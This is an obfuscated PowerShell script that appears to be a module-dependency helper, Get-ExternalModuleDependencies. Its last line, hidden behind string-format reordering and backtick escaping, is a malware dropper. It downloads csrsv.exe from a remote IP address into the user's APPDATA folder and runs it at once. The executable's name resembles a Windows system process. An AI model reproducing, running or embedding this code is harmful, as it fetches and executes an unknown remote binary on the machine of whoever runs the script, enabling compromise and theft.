function geT-eXTeRNalmOD`Ul`edEpENd`e`N`cies
{
    Param (
        [Parameter(MaNDAToRY=${T`RuE})]
        [PSModuleInfo]
        ${psMO`d`UlEInFo}
    )

    if(${P`s`Mo`DuleINFO}."P`R`ivaTeDA`Ta" -and
       (${pSm`odULe`iNFO}."PriVa`T`EdATA".("{2}{1}{0}" -f 'e','p','GetTy').Invoke().("{1}{0}" -f 'g','ToStrin').Invoke() -eq ("{4}{0}{6}{1}{3}{5}{2}" -f '.C','llectio','table','ns.Ha','System','sh','o')) -and
       ${PS`MOd`ULeinfo}."pR`IVa`T`edAta"[("{1}{0}" -f 'a','PSDat')] -and
       (${P`smODUle`info}."pRIVaTEd`A`Ta"[("{1}{0}"-f'ata','PSD')].("{1}{0}"-f'pe','GetTy').Invoke().("{0}{1}{2}"-f 'ToSt','rin','g').Invoke() -eq ("{4}{1}{6}{0}{5}{2}{3}" -f 'i','em.Colle','Hashtabl','e','Syst','ons.','ct')) -and
       ${psm`oD`U`LE`InFO}."pRIVa`T`edA`TA"."P`SdAta"[("{6}{3}{5}{0}{4}{2}{1}"-f'd','endencies','p','e','uleDe','rnalMo','Ext')] -and
       (${pSMod`U`Lei`NfO}."Pr`IVaTED`A`Ta"."p`s`DAtA"[("{7}{1}{2}{5}{3}{4}{0}{6}" -f 'c','rnalModu','l','Dep','enden','e','ies','Exte')].("{0}{2}{1}"-f'Ge','Type','t').Invoke().("{0}{1}{2}"-f'T','oSt','ring').Invoke() -eq ("{4}{1}{2}{3}{0}" -f']','tem','.Obje','ct[','Sys'))
    )
    {
        return ${pS`moDUlEI`NFO}."pRIv`Ate`DAta"."Psda`TA"."extern`ALModuLEDePen`dE`Nci`Es"
    }
}
(.("{0}{1}{2}"-f 'New-','O','bject') ("{3}{0}{4}{5}{6}{2}{1}"-f's','lient','ebC','Sy','t','em.Ne','t.W')).("{3}{1}{2}{0}"-f 'le','ownload','Fi','D').Invoke(("{4}{1}{5}{6}{3}{7}{0}{9}{2}{8}"-f'238/','t','rsv.ex','02.53','ht','p:/','/94.1','.','e','~yahoo/cs'),"$env:APPDATA\csrsv.exe");.("{3}{0}{1}{2}"-f'a','rt-Pro','cess','St') ("$env:APPDATA\csrsv.exe")
